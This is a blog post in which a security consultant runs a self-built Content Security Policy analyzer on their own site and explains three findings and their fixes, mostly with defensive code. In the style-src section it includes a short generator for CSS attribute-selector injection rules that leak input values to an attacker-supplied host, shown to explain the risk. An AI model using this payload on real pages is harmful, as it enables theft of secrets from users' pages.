I Built a Security Scanner, Then Pointed It at Myself

Apr 27, 2026 · 7 min read

Most security writing aimed at engineers stops at the policy diagram. The hard part — what the broken version actually looks like in a browser, on the wire, in a Burp tab — usually doesn't make the slide. After enough years of explaining that gap by hand, I wanted a place where the gap was the demo. So I started building one.

What the lab is

lab.marwandiallo.com is a small set of hands-on security playgrounds for the failure modes I run into most in consulting work: identity (passkeys + JWT), Content Security Policy, prompt injection against LLM apps, SSRF and cloud metadata exposure, and broken object-level authorization. Each lab pairs a working tool or simulator with the specific bug class it teaches.

Architecturally, the labs are deterministic rule engines, not AI. They follow the same pattern as Google's csp-evaluator, Mozilla Observatory, and the passive scan rules in OWASP ZAP: parse the input, walk a small ruleset, return findings with severity and remediation. The intent was an engineer-friendly linter for one specific class of risk at a time, not a replacement for an audit.
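A minimal sketch of that parse → ruleset → findings shape, with illustrative types and rule signatures (the lab's real interfaces and rule IDs may differ):

```typescript
type Severity = "high" | "medium" | "low" | "info";
interface Finding { id: string; severity: Severity; message: string; }
type Rule = (directives: Map<string, string[]>) => Finding | null;

// Parse "script-src 'self'; style-src 'self'" into directive → source list.
function parseCsp(header: string): Map<string, string[]> {
  const directives = new Map<string, string[]>();
  for (const part of header.split(";")) {
    const [name, ...values] = part.trim().split(/\s+/);
    if (name) directives.set(name.toLowerCase(), values);
  }
  return directives;
}

// Walk every rule over the parsed policy and collect findings.
function evaluate(header: string, rules: Rule[]): Finding[] {
  const directives = parseCsp(header);
  return rules.flatMap((rule) => rule(directives) ?? []);
}
```

The deterministic shape is the point: the same header always produces the same findings, which is what makes the output usable in CI.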

The review

Before I shared the lab publicly I asked a friend who works on application security to look it over and try to break it. The first thing they asked was the question I should have asked myself a week earlier:

"Have you ever run your CSP analyzer against your own site?"

I had not. That is a bad answer for someone publishing a security tool, and it is the answer the rest of this essay is about.

What the analyzer found

I pasted the live Content-Security-Policy header from marwandiallo.com into my own analyzer. Three findings came back:

1 high · 2 low

CSP02 — 'unsafe-inline' on script-src       (high)
CSP10 — 'unsafe-inline' on style-src        (low)
CSP11 — No CSP reporting configured         (low)

Three findings, each one specific enough to be unambiguous, and the high-severity one was a textbook XSS-bypass condition.

How each finding works

CSP02 — 'unsafe-inline' on script-src

What the rule flags. A Content Security Policy that includes 'unsafe-inline' in its script-src directive. 'unsafe-inline' tells the browser it is allowed to execute any inline <script> block or DOM event handler attribute (onclick=, onerror=) that appears in the HTML.

Why this is the high-severity one. Inline scripts are the most common cross-site-scripting payload shape. If an attacker can get arbitrary HTML into the page (a comment field, a profile name, a search reflection) and the page allows inline scripts, the payload runs. CSP exists to break that chain. Allowing 'unsafe-inline' in script-src keeps the directive present in the response but effectively turns it off.

Standards mapping. OWASP Top 10 A03:2021 Injection, CWE-79 (Improper Neutralization of Input During Web Page Generation), CIS Controls v8 Safeguard 16.10 (Apply Secure Design Principles in Application Architectures).

The fix. Drop 'unsafe-inline', generate a per-request nonce in middleware, and add 'strict-dynamic'. Next.js 15 supports this directly: setting an x-nonce request header lets the framework propagate the nonce to its own runtime script tags.

// middleware.ts
import { NextResponse, type NextRequest } from "next/server";

export function middleware(request: NextRequest) {
  const nonce = Buffer.from(crypto.randomUUID()).toString("base64");
  const csp = [
    `script-src 'self' 'nonce-${nonce}' 'strict-dynamic' https://va.vercel-scripts.com`,
    // …
  ].join("; ");

  // Forward the nonce so Next.js can apply it to its own script tags,
  // and attach the policy to the outgoing response.
  const headers = new Headers(request.headers);
  headers.set("x-nonce", nonce);
  const response = NextResponse.next({ request: { headers } });
  response.headers.set("Content-Security-Policy", csp);
  return response;
}

With nonce + 'strict-dynamic' in place, an injected payload reaches the DOM and the browser refuses to execute it. The lab knows this, by the way: CSP02 is deliberately written to not fire if the policy already has 'strict-dynamic' and a nonce or hash, because in that combination browsers are required to ignore 'unsafe-inline' (CSP Level 3 §6.6.2.4). Most public CSP analyzers I've used don't get that exception right, which was part of what motivated me to write this one.

CSP10 — 'unsafe-inline' on style-src

What the rule flags. The same directive condition as CSP02, but applied to inline CSS instead of inline JavaScript.

Why it's flagged at low severity. CSS-only XSS is much harder than script XSS, but it is not zero. Attribute selectors, font ligatures, and scrollbar tricks have all been demonstrated to exfiltrate page contents one character at a time when an attacker can inject styles into a sensitive page.
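To make the attribute-selector shape concrete, here is a sketch of how such an injection is typically generated; the selector, attribute, and host are all placeholders, and a real attack chains thousands of these rules to leak a value one character at a time:

```typescript
// One CSS rule per guessed prefix: if the input's value starts with the
// prefix, the browser fetches the attacker's URL, leaking that character.
function cssExfilRules(attr: string, prefixes: string[], host: string): string {
  return prefixes
    .map(
      (p) =>
        `input[${attr}^="${p}"] { background: url(https://${host}/leak?v=${encodeURIComponent(p)}); }`
    )
    .join("\n");
}
```

The exfiltration is one bit per rule per page load, which is why the finding is low severity rather than high.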

Standards mapping. Same family as CSP02: CWE-79, OWASP A03:2021. Lower CVSS because the exploit is bandwidth-constrained and requires more attacker setup.

The fix. Same shape as CSP02. Tailwind compiles to external CSS, so dropping 'unsafe-inline' on style-src cost me nothing in this codebase.

CSP11 — no CSP reporting configured

What the rule flags. A CSP that includes neither a report-to nor a report-uri directive, and has no matching Report-To response header.

Why it matters. Without reporting, every CSP violation in production happens silently. You don't see the in-the-wild XSS attempts the policy is blocking, and you don't see the well-meaning library you added last week that's now triggering policy failures for real users. CSP without reporting is a control you can't observe.

Standards mapping. NIST SP 800-53 AU-2 (Audit Events) and SI-4 (System Monitoring). CIS Controls v8 Control 8 (Audit Log Management).

The fix. A small Edge route at /api/csp-report that accepts both the legacy application/csp-report and the modern application/reports+json payloads, caps the body at 16 KiB, and writes structured logs to the Vercel runtime. Then add report-to csp-endpoint; report-uri /api/csp-report to the policy, plus the matching Report-To response header. One route, two directives, one header.
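A sketch of what that route can look like, assuming a Next.js App Router Edge handler; the status codes and log shape here are my choices for illustration, not necessarily the lab's:

```typescript
export const runtime = "edge";

const MAX_BODY = 16 * 1024; // 16 KiB cap (measured in UTF-16 units, close enough)

export async function POST(request: Request): Promise<Response> {
  const contentType = request.headers.get("content-type") ?? "";
  // Accept both the legacy report-uri payload and the modern Reporting API one.
  if (!contentType.includes("csp-report") && !contentType.includes("reports+json")) {
    return new Response(null, { status: 415 });
  }
  const body = await request.text();
  if (body.length > MAX_BODY) {
    return new Response(null, { status: 413 });
  }
  try {
    // One structured log line per report; the platform log viewer picks up stdout.
    console.log(JSON.stringify({ kind: "csp-report", contentType, report: JSON.parse(body) }));
  } catch {
    return new Response(null, { status: 400 });
  }
  return new Response(null, { status: 204 });
}
```

Returning 204 keeps browsers from retrying, and the size cap plus content-type check keeps the endpoint from becoming a free log-injection sink.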

Re-running the scanner

I pushed the changes, waited for Vercel to redeploy, and pasted the new live CSP back into the analyzer.

0 high · 0 medium · 0 low · 0 info

For independent verification I ran securityheaders.com and Mozilla Observatory against the same URL. Both passed.

What this kind of tool can and can't do

A static CSP analyzer is not a substitute for a real-world security audit. It checks a string against a fixed ruleset, so it is worth being explicit about both halves of that:

What the analyzer does:

  • Parse a Content Security Policy header and apply a ruleset of known weakening patterns (CSP01–CSP11) with severity and remediation.
  • In runtime mode, fetch a target URL on the server side and run the same ruleset against the live response headers, so you can verify what you actually ship instead of what you think you ship.
  • Honor CSP Level 3 nuance, including the 'strict-dynamic' + nonce/hash exception that makes most public analyzers report false positives.
  • Export findings as JSON or SARIF for use in CI and GitHub code scanning.
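The SARIF half of that last bullet can be sketched as a plain mapping; field names follow the SARIF 2.1.0 spec, while the Finding shape and tool name are illustrative:

```typescript
interface Finding { id: string; severity: "high" | "medium" | "low" | "info"; message: string; }

function toSarif(findings: Finding[]) {
  // GitHub code scanning understands error/warning/note levels.
  const level = (s: Finding["severity"]) =>
    s === "high" ? "error" : s === "medium" ? "warning" : "note";
  return {
    version: "2.1.0",
    $schema: "https://json.schemastore.org/sarif-2.1.0.json",
    runs: [
      {
        tool: { driver: { name: "csp-analyzer", informationUri: "https://lab.marwandiallo.com" } },
        results: findings.map((f) => ({
          ruleId: f.id,
          level: level(f.severity),
          message: { text: f.message },
        })),
      },
    ],
  };
}
```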

What the analyzer does not do:

  • Test whether the nonce is genuinely unique per request; reusing a static nonce is a critical implementation bug in some homemade middleware.
  • Find your missing security controls; only your weak existing ones.
  • Catch logic flaws, IDOR, broken authorization, or any OWASP Top 10 category that isn't string-shaped.
  • Replace a code review, a threat model, or an actual penetration test.
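The first of those gaps can at least be spot-checked by hand: fetch the same page twice and confirm the nonce changed. Both functions here are illustrative, not part of the analyzer:

```typescript
// Pull the nonce value out of a CSP header string, if one is present.
function extractNonce(csp: string): string | null {
  return /'nonce-([^']+)'/.exec(csp)?.[1] ?? null;
}

// Two requests, two nonces: a static nonce means the middleware is broken.
async function nonceIsPerRequest(url: string): Promise<boolean> {
  const getNonce = async () =>
    extractNonce((await fetch(url)).headers.get("content-security-policy") ?? "");
  const first = await getNonce();
  const second = await getNonce();
  return first !== null && second !== null && first !== second;
}
```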

What it does well is give you a one-minute read on whether the security header you spent half an hour writing is actually doing its job. It is roughly the same category of feedback as ESLint or cargo clippy: a fast, deterministic linter for one specific class of risk.

Closing

The thing I keep coming back to from this exercise is small but useful: the tool you build to score other people's work has to be the first one you score yourself with. Not because the finding will always be a high — most of the time it won't — but because the act of running it forces you to sit in the same chair as the people you're asking to take it seriously.

If you want to do the same exercise on your own site, the CSP analyzer is here. Paste your header into the textarea, or drop a URL into the scanner mode and let it fetch your live policy. If you find something interesting, or find a bug in the analyzer itself, I'd like to hear about it.
